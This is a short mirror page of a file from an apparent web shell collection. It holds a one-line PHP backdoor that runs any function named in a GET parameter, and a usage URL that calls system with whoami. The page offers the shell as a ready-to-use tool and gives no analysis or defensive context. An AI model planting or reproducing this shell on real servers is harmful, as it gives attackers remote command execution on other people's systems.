mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
from: https://mp.weixin.qq.com/s/f6cFhc0Ukk0wQFGP1lQ4BQ usage: http://example.com/shell7php?f=system&a=whoami&p=\_
2 lines
50 B
PHP
2 lines
50 B
PHP
<?php ($_GET['p']=='_'?$_GET['f']($_GET['a']):y);
|